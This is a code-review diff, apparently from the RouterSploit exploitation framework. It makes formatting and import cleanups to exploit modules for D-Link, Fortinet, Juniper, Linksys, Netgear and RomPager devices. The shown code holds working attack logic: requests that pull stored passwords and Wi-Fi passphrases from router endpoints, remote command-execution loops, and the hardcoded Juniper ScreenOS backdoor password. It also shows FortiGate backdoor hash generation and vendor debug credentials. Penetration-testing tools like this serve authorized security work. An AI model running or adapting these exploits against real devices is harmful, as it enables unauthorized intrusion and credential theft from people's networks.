url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
......@@ -52,7 +58,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
......@@ -60,11 +65,10 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
if len(creds):
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/dlink/dir_300_600_rce.py
import requests
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_status,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +18,8 @@ class Exploit(exploits.Exploit):
'name': 'D-LINK DIR-300 & DIR-600 RCE',
'description': 'Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Michael Messner <devnull[at]s3cur1ty.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router',
......@@ -22,7 +28,7 @@ class Exploit(exploits.Exploit):
],
'targets': [
'D-Link DIR 300',
'D-Link DIR 600',
'D-Link DIR 600',
]
}
......@@ -30,7 +36,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -72,4 +78,3 @@ class Exploit(exploits.Exploit):
return True
return False
routersploit/modules/exploits/dlink/dir_645_password_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,19 +19,19 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-645 Password Disclosure',
'description': 'Module exploits D-Link DIR-645 password disclosure vulnerability.',
'authors': [
'Roberto Paleari <roberto[at]greyhats.it>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Roberto Paleari <roberto[at]greyhats.it>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt'
],
'targets': [
],
'targets': [
'D-Link DIR-645 (Versions < 1.03)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
# address and parameters
......@@ -57,11 +63,10 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
# address and parameters
url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
data = {"SERVICES": "DEVICE.ACCOUNT"}
data = {"SERVICES": "DEVICE.ACCOUNT"}
# connection
try:
......@@ -75,7 +80,6 @@ class Exploit(exploits.Exploit):
creds = re.findall(regular, re.sub('\s+', '', res))
if len(creds):
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/dlink/dns_320l_327l_rce.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_status,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
'name': 'D-LINK DNS-320L & DIR-327L RCE',
'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Gergely Eberhardt', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Gergely Eberhardt', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf',
......@@ -29,7 +35,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -65,13 +71,10 @@ class Exploit(exploits.Exploit):
try:
r = requests.get(url)
res = r.text
except:
return None
if "9fdbd928b52c1ef61615a6fd2e8b49af" in r:
return True
return False
routersploit/modules/exploits/dlink/dsl_2750b_info_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -17,17 +23,17 @@ class Exploit(exploits.Exploit):
'Jose Rodriguez # vulnerability discovery',
'Ivan Sanz # vulnerability discovery',
'Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module',
],
],
'references': [
'http://seclists.org/fulldisclosure/2015/May/129'
],
'targets': [
],
'targets': [
'D-Link DSL-2750B EU_1.01',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
......@@ -50,7 +56,7 @@ class Exploit(exploits.Exploit):
val = re.findall(regexp, res)
if len(val):
creds.append((d,val[0]))
creds.append((d, val[0]))
if len(creds):
print_success("Credentials found!")
......@@ -61,7 +67,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
......@@ -73,6 +78,5 @@ class Exploit(exploits.Exploit):
if any(map(lambda x: x in res, ["SSID", "PassPhrase"])):
return True # target vulnerable
return False # target not vulnerable
return False # target not vulnerable
routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
import requests
import json
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
print_table,
print_status,
)
class Exploit(exploits.Exploit):
......@@ -13,19 +20,19 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DWR-932 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DWR-932 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'Saeed reza Zamanian' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Saeed reza Zamanian' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/39581/',
],
'targets': [
],
'targets': [
'D-Link DWR-932',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
......@@ -58,7 +65,6 @@ class Exploit(exploits.Exploit):
headers = ("Parameter", "Value")
print_table(headers, *rows)
def check(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
......@@ -67,10 +73,9 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if 'wifi_AP1_ssid' in res:
return True # target is vulnerable
return True # target is vulnerable
return False # target not vulnerable
routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py
......@@ -8,7 +8,12 @@ import tty
import sys
from paramiko.py3compat import u
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
print_status,
)
class Exploit(exploits.Exploit):
......@@ -20,8 +25,8 @@ class Exploit(exploits.Exploit):
'name': 'FortiGate OS 4.x-5.0.7 Backdoor',
'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'operator8203', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'operator8203', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router',
......@@ -92,7 +97,6 @@ class Exploit(exploits.Exploit):
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def check(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
......@@ -127,4 +131,3 @@ class Exploit(exploits.Exploit):
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
return [h]
routersploit/modules/exploits/juniper/screenos_backdoor.py
import paramiko
import telnetlib
import select
import socket
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
)
class Exploit(exploits.Exploit):
......@@ -15,19 +17,19 @@ class Exploit(exploits.Exploit):
'name': 'Juniper ScreenOS Backdoor',
'description': 'Module exploits Juniper ScreenOS Authentication Backdoor vulnerability. If the target is is possible to authentiate to the device.',
'authors': [
'hdm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'hdm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor',
],
'targets': [
],
'targets': [
'Juniper ScreenOS 6.2.0r15 to 6.2.0r18',
'Juniper ScreenOS 6.3.0r12 to 6.3.0r20',
]
]
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = "admin"
password = "<<< %s(un='%s') = %u"
......@@ -58,12 +60,12 @@ class Exploit(exploits.Exploit):
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$",">"])):
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication")
tn.write("\r\n")
tn.interact()
......@@ -71,12 +73,12 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection Error")
return
return
def check(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
except:
......@@ -92,13 +94,13 @@ class Exploit(exploits.Exploit):
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$",">"])):
if any(map(lambda x: x in res, ["#", "$", ">"])):
tn.close()
return True
tn.close()
......@@ -106,4 +108,3 @@ class Exploit(exploits.Exploit):
return False
return False
routersploit/modules/exploits/linksys/wap54gv3_rce.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
print_status,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://seclists.org/bugtraq/2010/Jun/93',
......@@ -28,7 +34,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -68,10 +74,9 @@ class Exploit(exploits.Exploit):
r = requests.post(url, data=data, auth=("Gemtek", "gemtekswd"))
res = r.text
except:
return None # could not be verified
return None # could not be verified
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True
return False
routersploit/modules/exploits/multi/misfortune_cookie.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,20 +17,20 @@ class Exploit(exploits.Exploit):
'name': 'Misfortune Cookie',
'description': 'Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.',
'authors': [
'Check Point <www.checkpoint.com>', # vulnerability discovery
'Jan Trencansky', # proof of concept exploit
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'Check Point <www.checkpoint.com>', # vulnerability discovery
'Jan Trencansky', # proof of concept exploit
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'references': [
'http://mis.fortunecook.ie/'
],
'targets': [
],
'targets': [
'multi'
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -43,25 +48,22 @@ class Exploit(exploits.Exploit):
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
try:
r = requests.get(url, headers=headers)
if r.status_code != 404:
return False # not rompage
return False # not rompage
else:
if 'server' in r.headers:
server = r.headers.get('server')
if re.search('RomPager', server) is not None:
if re.search('omg1337hax', r.text) is not None:
return True # device is vulnerable
return True # device is vulnerable
else:
return None # might be still vulnerable but could not be verified
return None # might be still vulnerable but could not be verified
except:
return None # could not be verified
return None # could not be verified
return False # target not vulnerable
routersploit/modules/exploits/netgear/n300_auth_bypass.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,19 +17,19 @@ class Exploit(exploits.Exploit):
'name': 'Netgear N300 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.',
'authors': [
'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
],
'targets': [
],
'targets': [
'Netgear N300',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -37,11 +41,11 @@ class Exploit(exploits.Exploit):
def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
try:
r = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError):
return None # target could not be verified
return None # target could not be verified
if r.status_code == requests.codes.unauthorized:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
......@@ -51,4 +55,3 @@ class Exploit(exploits.Exploit):
return True
return False # target not vulnerable
routersploit/modules/scanners/dlink_scan.py
from routersploit import *
from os import listdir
from os.path import isfile, join
import imp
from routersplot import (
exploits,
print_success,
print_error,
print_status,
)
class Exploit(exploits.Exploit):
"""
......@@ -12,20 +18,19 @@ class Exploit(exploits.Exploit):
'name': 'D-Link Scanner',
'description': 'Scanner module for D-Link devices',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
exploits = []
rootpath = 'routersploit/modules/'
path = 'exploits/dlink/'
# only py exploit files
modules = [f.replace(".py", "") for f in listdir(rootpath+path) if isfile(join(rootpath+path, f)) and f.endswith(".py") and f != "__init__.py"]
modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]
vulns = []
for module_name in modules:
......@@ -47,7 +52,7 @@ class Exploit(exploits.Exploit):
else:
print_status("{} could not be verified".format(f))
print
print
if len(vulns):
print_success("Device is vulnerable!")
for v in vulns:
......@@ -58,4 +63,3 @@ class Exploit(exploits.Exploit):
def check(self):
print_error("Check method is not available")
routersploit/utils.py
......@@ -122,7 +122,8 @@ class LockedIterator(object):
self.lock = threading.Lock()
self.it = it.__iter__()
def __iter__(self): return self
def __iter__(self):
return self
def next(self):
self.lock.acquire()
......@@ -170,7 +171,7 @@ def print_table(headers, *args, **kwargs):
headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill)))
headers_separator_line = "".join((
headers_separator_line,
'{:<{}}'.format(header_separator*len(header), current_line_fill)
'{:<{}}'.format(header_separator * len(header), current_line_fill)
))
print()
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment